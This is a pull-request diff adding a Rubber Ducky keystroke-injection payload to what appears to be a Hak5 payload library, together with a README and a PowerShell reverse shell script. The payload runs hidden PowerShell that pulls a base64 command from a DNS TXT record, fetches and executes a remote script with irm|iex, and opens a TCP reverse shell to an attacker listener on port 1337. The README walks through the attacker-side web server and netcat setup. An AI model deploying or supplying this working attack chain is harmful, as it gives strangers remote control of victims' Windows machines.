Merge pull request #468 from nathansb2022/master

Create payload DNS-TXT-CommandInjection.txt

payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt

@@ -0,0 +1,59 @@
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+REM_BLOCK
+Title: DNS-TXT-CommandInjection
+CONFIGURATION
+REQUIRED - Provide URL used for Example #MY_TARGET_URL
+NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
+for the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record.
+Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
+Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
+Create TXT record in AWS Route53
+https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method
+END_REM
+
+DEFINE #MY_TARGET_URL example.com
+GUI r
+DELAY 500
+STRINGLN powershell /w 1 $a=(resolve-dnsname #MY_TARGET_URL TXT).strings;powershell -e $a

payloads/library/execution/DNS-TXT-CommandInjection/README.md

@@ -0,0 +1,47 @@
+# DNS-TXT-CommandInjection
+Ducky Script uses Resolve-DnsName to perform a DNS name query resolution for a domain hosting a malicious TXT record. The payload leverages DNS TXT records to perform command injection. Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with the base64 encoded payload you have. 
+## Description
+Author: Nate\
+Target: Windows 10, 11\
+Props: Hak5, Darren Kitchen, Korben\
+Version: 1.0\
+Category: Execution
+## Configuration
+1. A domain with the ability to manipulate the DNS TXT records.
+2. Add command to DNS TXT records. See Links for an example of creating your DNS TXT record in AWS Route53 service.
+3. Web Server hosting a file. In this example, python3 http.server was used to host a reverseshell.
+4. Update powershellReverseShellOne-liner.ps1.
+5. Set up istener on the attacker machine to reflect what is in powershellReverseShellOne-liner.ps1. Netcat was used in this example.
+6. Provide URL used for Example #MY_TARGET_URL in DNS-TXT-CommandInjection.txt
+## Notes
+Other commands can be added to DNS TXT record rather than the example below.
+No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRINGLN payload. Examples of the decoded command and encoded command are shown below to put into the DNS TXT record.
+
+Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"\
+Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
+
+powershellReverseShellOne-liner.ps1 is identical to T1.txt. (shortened due to character limitations)\
+ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
+## Windows Commands (used in payload)
+### Execute DNS TXT Payload
+```Powershell
+powershell /w 1 $a=(resolve-dnsname #MY_TARGET_URL TXT).strings;powershell -e $a
+```
+### Execute web hosted Powershell Reverseshell
+```Powershell
+irm http://MY_TARGET_URL/T1.txt | iex
+```
+## Linux Commands
+### Web Server to host a file
+```Bash
+python3 -m http.server 80
+```
+### Netcat listener
+```Bash
+nc -lvnp 1337
+```
+### Links
+
+[Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
+
+[Create TXT record in AWS Route53](https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method)

payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1

@@ -0,0 +1,5 @@
+# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
+# CONFIGURATION
+# REQUIRED - Provide IP and Port used for Example
+# REQUIRED - MY_TARGET_IP and Port after TCPClient( 
+$client = New-Object System.Net.Sockets.TCPClient('MY_TARGET_IP',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()